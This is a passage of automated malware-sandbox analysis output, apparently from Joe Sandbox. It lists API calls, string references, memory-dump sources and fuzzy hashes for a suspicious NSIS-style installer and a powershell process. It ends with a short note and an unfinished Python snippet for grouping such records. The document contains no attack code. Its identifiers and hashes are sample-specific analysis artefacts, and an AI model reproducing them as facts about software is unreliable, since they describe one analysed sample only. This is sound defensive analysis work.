                                                              • Instruction Fuzzy Hash: 62017571905240EFE7005BB4EE49BDD3FA4AB15301F10867AF541B61E2C7B904458BED
                                                              APIs
                                                              • lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E24
                                                              • wsprintfW.USER32 ref: 00404E2D
                                                              • SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E40
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ItemTextlstrlenwsprintf
                                                              • String ID: %u.%u%s%s
                                                              • API String ID: 3540041739-3551169577
                                                              • Opcode ID: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
                                                              • Instruction ID: 0fe25742dfe6cfa92c38baccc724587d3b65f537d6828788df476db8ac6fa50e
                                                              • Opcode Fuzzy Hash: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
                                                              • Instruction Fuzzy Hash: B111EB336042283BDB109A6DAC45E9E329CDF85374F250237FA65F71D1E978DC2282E8
                                                              APIs
                                                              • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsbB152.tmp,?,00405F45,C:\Users\user\AppData\Local\Temp\nsbB152.tmp,C:\Users\user\AppData\Local\Temp\nsbB152.tmp, 4Wu,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,75573420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405EDF
                                                              • CharNextW.USER32(00000000), ref: 00405EE4
                                                              • CharNextW.USER32(00000000), ref: 00405EFC
                                                              Strings
                                                              • C:\Users\user\AppData\Local\Temp\nsbB152.tmp, xrefs: 00405ED2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CharNext
                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsbB152.tmp
                                                              • API String ID: 3213498283-627501760
                                                              • Opcode ID: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
                                                              • Instruction ID: 143c5bdbadb979d876a68ad22b5e9fde56015454fa81a7c55dbcd1e73dec783f
                                                              • Opcode Fuzzy Hash: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
                                                              • Instruction Fuzzy Hash: 03F09072D04A2395DB317B649C45B7756BCEB587A0B54843BE601F72C0DBBC48818ADA
                                                              APIs
                                                              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405E2C
                                                              • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405E36
                                                              • lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405E48
                                                              Strings
                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E26
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CharPrevlstrcatlstrlen
                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                              • API String ID: 2659869361-4083868402
                                                              • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                              • Instruction ID: dcb1dcffde27bcde4b46a4bd7655c85b8e924b1ae314dab144fc932f30a80b76
                                                              • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                              • Instruction Fuzzy Hash: 9DD0A731501534BAC212AB54AD04DDF62AC9F46344381443BF141B30A5C77C5D51D7FD
                                                              APIs
                                                              • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll), ref: 0040269A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: lstrlen
                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsbB152.tmp$C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll
                                                              • API String ID: 1659193697-3977306812
                                                              • Opcode ID: 968f49f8d356fad33376679beb12f00283f02b2e5d5c32db5a7590a3cc778f05
                                                              • Instruction ID: 71653ae2733df7adc71dfdbaa34589fb2472b89c06e6b839d1f3baa03dac964a
                                                              • Opcode Fuzzy Hash: 968f49f8d356fad33376679beb12f00283f02b2e5d5c32db5a7590a3cc778f05
                                                              • Instruction Fuzzy Hash: E011E772A40205BBCB00ABB19E56AAE7671AF50748F21443FF402B71C1EAFD4891565E
                                                              APIs
                                                              • DestroyWindow.USER32(00000000,00000000,004031FC,00000001), ref: 00403031
                                                              • GetTickCount.KERNEL32 ref: 0040304F
                                                              • CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 0040306C
                                                              • ShowWindow.USER32(00000000,00000005), ref: 0040307A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                              • String ID:
                                                              • API String ID: 2102729457-0
                                                              • Opcode ID: 3e0f77edca3fe8d4731edd858be8c75d6ac57a75eac47466490e255ad15c8a0f
                                                              • Instruction ID: 9291db8f65f8f9a8906298ccab22143765a9ea5c3e1cf5a275661437a5304794
                                                              • Opcode Fuzzy Hash: 3e0f77edca3fe8d4731edd858be8c75d6ac57a75eac47466490e255ad15c8a0f
                                                              • Instruction Fuzzy Hash: 22F08970602A21AFC6306F50FE09A9B7F68FB45B52B51053AF445B11ACCB345C91CB9D
                                                              APIs
                                                              • IsWindowVisible.USER32(?), ref: 0040557F
                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 004055D0
                                                                • Part of subcall function 00404522: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404534
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Window$CallMessageProcSendVisible
                                                              • String ID:
                                                              • API String ID: 3748168415-3916222277
                                                              • Opcode ID: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
                                                              • Instruction ID: 994decb8795c597c60d879b60f38f30bda4d2919c1ffc13ce94f3a2918c86729
                                                              • Opcode Fuzzy Hash: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
                                                              • Instruction Fuzzy Hash: 1C01717120060CBFEF219F11DD84A9B3B67EB84794F144037FA41761D5C7398D529A6D
                                                              APIs
                                                              • CharNextExA.USER32(?,0000000A,00000000,6FF630B8,?,6FF616EA,?,00000002,00000002,0000000A), ref: 6FF61974
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1450170496.000000006FF61000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FF60000, based on PE: true
                                                              • Associated: 00000000.00000002.1450157086.000000006FF60000.00000002.00000001.01000000.00000005.sdmp
                                                              • Associated: 00000000.00000002.1450186265.000000006FF62000.00000002.00000001.01000000.00000005.sdmp
                                                              • Associated: 00000000.00000002.1450199247.000000006FF63000.00000004.00000001.01000000.00000005.sdmp
                                                              • Associated: 00000000.00000002.1450217071.000000006FF64000.00000002.00000001.01000000.00000005.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ff60000_file.jbxd
                                                              Similarity
                                                              • API ID: CharNext
                                                              • String ID: $
                                                              • API String ID: 3213498283-227171996
                                                              • Opcode ID: 9c20e8890f8ccf62c26dd374a6dfca474335157b1eeb9c1959044676b045daab
                                                              • Instruction ID: dff2a9ae99b4bdd6c4c64f0b405e930073f51688cf4a36551160415d2f5a650f
                                                              • Opcode Fuzzy Hash: 9c20e8890f8ccf62c26dd374a6dfca474335157b1eeb9c1959044676b045daab
                                                              • Instruction Fuzzy Hash: 63F01C311183CA9ADF11CF54C824BEA7FA9AF15644F540458FD908B282CB75E629CBA1
                                                              APIs
                                                              • FreeLibrary.KERNEL32(?,75573420,00000000,C:\Users\user\AppData\Local\Temp\,00403B6C,00403A82,?,?,00000008,0000000A,0000000C), ref: 00403BAE
                                                              • GlobalFree.KERNEL32(00000000), ref: 00403BB5
                                                              Strings
                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B94
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Free$GlobalLibrary
                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                              • API String ID: 1100898210-4083868402
                                                              • Opcode ID: 522759d04011631da2fa13ba2704cf46823a2ab452b41ebb0ecea140ccdeae61
                                                              • Instruction ID: cb28855b84c3abb27e6c937247341fa4f051846acd49e0d4b6103447305c23c4
                                                              • Opcode Fuzzy Hash: 522759d04011631da2fa13ba2704cf46823a2ab452b41ebb0ecea140ccdeae61
                                                              • Instruction Fuzzy Hash: 5DE0C23362083097C6311F55EE04B1A7778AF89B2AF01402AEC407B2618B74AC538FCC
                                                              APIs
                                                              • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\file.exe,C:\Users\user\Desktop\file.exe,80000000,00000003), ref: 00405E78
                                                              • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\file.exe,C:\Users\user\Desktop\file.exe,80000000,00000003), ref: 00405E88
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CharPrevlstrlen
                                                              • String ID: C:\Users\user\Desktop
                                                              • API String ID: 2709904686-1876063424
                                                              • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                              • Instruction ID: c6f1eefeac9f22653a6718740f6635ad40246fc98af2d22d27e4b5974eb8f820
                                                              • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                              • Instruction Fuzzy Hash: E1D0A7B3400930EEC312AB04EC04DAF73ACEF123007868827F980A7165D7785D81C6EC
                                                              APIs
                                                              • lstrlenW.KERNEL32(?,7556F360,00000000,00000000,?,?,6FF61295,00000000,/TIMEOUT=,00000000), ref: 6FF61A71
                                                              • lstrlenW.KERNEL32(?,?,?,6FF61295,00000000,/TIMEOUT=,00000000), ref: 6FF61A7C
                                                              • lstrcmpiW.KERNEL32(?,?,?,?,6FF61295,00000000,/TIMEOUT=,00000000), ref: 6FF61A9A
                                                              • lstrlenW.KERNEL32(00000000,?,?,6FF61295,00000000,/TIMEOUT=,00000000), ref: 6FF61AB5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1450170496.000000006FF61000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FF60000, based on PE: true
                                                               • Associated: 00000000.00000002.1450157086.000000006FF60000.00000002.00000001.01000000.00000005.sdmp
                                                               • Associated: 00000000.00000002.1450186265.000000006FF62000.00000002.00000001.01000000.00000005.sdmp
                                                               • Associated: 00000000.00000002.1450199247.000000006FF63000.00000004.00000001.01000000.00000005.sdmp
                                                               • Associated: 00000000.00000002.1450217071.000000006FF64000.00000002.00000001.01000000.00000005.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ff60000_file.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$lstrcmpi
                                                              • String ID:
                                                              • API String ID: 1808961391-0
                                                              • Opcode ID: 8f2b0ac81324d8c887789aa71978c0a759866a2092f5b5c70d7dbc1b8c98b5e6
                                                              • Instruction ID: 598e5cf4dbc9a86615c4d5659826ab4ab2d815ef8cdb94f56f118097fe497ae8
                                                              • Opcode Fuzzy Hash: 8f2b0ac81324d8c887789aa71978c0a759866a2092f5b5c70d7dbc1b8c98b5e6
                                                              • Instruction Fuzzy Hash: 5F018136200518BFDB11DFA9DC80D9D77E8EF467A071140AAF904DB221DB70EA41DBA4
                                                              APIs
                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBC
                                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FD4
                                                              • CharNextA.USER32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FE5
                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                              • String ID:
                                                              • API String ID: 190613189-0
                                                              • Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                              • Instruction ID: e9567a821587a5f0376c4e2be66d4cfc8c6f540c5076303c4651ac02cb4e93c6
                                                              • Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                              • Instruction Fuzzy Hash: E1F09631105519FFC7029FA5DE00D9FBBA8EF05350B2540B9F840F7250D678DE01AB69
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2214506960.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7750000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 056cd9a2c46d4e966949b1efaf8d86511d06cfbca49b4062ec403044855cb36e
                                                              • Instruction ID: 3e61f6a63ea10b0a96f171642f4286735d3642472a81afc960e3323209162ba0
                                                              • Opcode Fuzzy Hash: 056cd9a2c46d4e966949b1efaf8d86511d06cfbca49b4062ec403044855cb36e
                                                              • Instruction Fuzzy Hash: 77035EB4A00215DFEB60DF64C850BEAB7B2BF8A304F1084A9D8196B754CB71ED82CF51
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2207728476.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_4c00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: \Vvk
                                                              • API String ID: 0-1806392228
                                                              • Opcode ID: 47fb10a9526470d82201c3193b298def3c774bd0f50eda7e68af6533ef0c113f
                                                              • Instruction ID: 3038db6dd748a852772867586c9b56a7f08b9843737992c4c62c2cba0c454209
                                                              • Opcode Fuzzy Hash: 47fb10a9526470d82201c3193b298def3c774bd0f50eda7e68af6533ef0c113f
                                                              • Instruction Fuzzy Hash: 7EB15C70E40219CFDF14CFA9D8857ADBBF2EF88704F14C929E815A7294EB35A941CB81
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2207728476.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_4c00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8c8bd60eeca143c4dffbaa3e944354a2d060282cfd467c3b97eff80e46c8aa55
                                                              • Instruction ID: f144715b1190c0fc04cebaa96e131c0bf8de2734dd7693fe969ed27698061c6d
                                                              • Opcode Fuzzy Hash: 8c8bd60eeca143c4dffbaa3e944354a2d060282cfd467c3b97eff80e46c8aa55
                                                              • Instruction Fuzzy Hash: EBB14F70E00209CFDB24CFA9D89579DBBF2AF88714F14C52DD415E7294EBB4A985CB81
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2207728476.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_4c00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 8Nvk$h]vk$h]vk$h]vk$Ivk
                                                              • API String ID: 0-457104239
                                                              • Opcode ID: 2a7ea63bcfa93246285ca2cb0ed9fd37c0ecafe7383f085cd772bc361ccba030
                                                              • Instruction ID: 88bdfcd66b2ddd7523f0ea2eb6f15b7166fe5323cf91ef328ecae1d6e3d5c7ca
                                                              • Opcode Fuzzy Hash: 2a7ea63bcfa93246285ca2cb0ed9fd37c0ecafe7383f085cd772bc361ccba030
                                                              • Instruction Fuzzy Hash: C7226234B002148FDB29DB64C9547ADB7B6BF89305F1484A9D409AB390DF35AE86CF85
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2207728476.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_4c00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: \Vvk$\Vvk
                                                              • API String ID: 0-1912818553
                                                              • Opcode ID: 549991ee21c6a7f68c536d8b7e611518edf36dace75b6ac42f506cb6e874a46b
                                                              • Instruction ID: a3e5083f0a648abeee43356b1e0859c1fbb31ee46d74c9c4491daa5fdf9a95ae
                                                              • Opcode Fuzzy Hash: 549991ee21c6a7f68c536d8b7e611518edf36dace75b6ac42f506cb6e874a46b
                                                              • Instruction Fuzzy Hash: C9714070E002099FDF24DFA9D8407AEBBF2AF88714F14C12DD815A7294DB74A985CB91
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2207728476.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_4c00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: \Vvk$\Vvk
                                                              • API String ID: 0-1912818553
                                                              • Opcode ID: 82ce0c1c75efc5ae056bc09fbe3ad673780396baef4702cf0543bdb0144670d7
                                                              • Instruction ID: d6d6513dc8c48029153e3cfc55504999a06f5dece596d88bbc39100c2bfe7207
                                                              • Opcode Fuzzy Hash: 82ce0c1c75efc5ae056bc09fbe3ad673780396baef4702cf0543bdb0144670d7
                                                              • Instruction Fuzzy Hash: 44714E70E002099FDF24DFA9D84579DBBF2AF88714F14C129D815A7290DBB4A985CF91
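The two records above carry the same API String ID (0-1912818553), the same strings, different Opcode IDs, and Instruction Fuzzy Hashes that differ in only a handful of hex positions. That is the pattern an analyst uses to spot one routine recurring across dumps of the same process. The following is an added example, not code from the Joe Sandbox report or its IDA plugin: it parses records written in this listing's layout and groups them three ways, by API String ID, by a positional comparison of Instruction Fuzzy Hashes, and by whether the dump is "based on PE". The record text is constructed from values visible in this report; the positional agreement metric, the 0.8 threshold, and the reading of "based on PE: false" as a region not mapped from a module on disk are assumptions made for the example, not Joe Sandbox's own definitions.

```python
import re
from collections import defaultdict
from itertools import combinations

# Constructed sample: three records copied from this report in the listing's own
# layout, including a "Download File" link label fused onto one dump name.
LISTING = r"""APIs
• FreeLibrary.KERNEL32(?,75573420,00000000,C:\Users\user\AppData\Local\Temp\,00403B6C,00403A82,?,?,00000008,0000000A,0000000C), ref: 00403BAE
Strings
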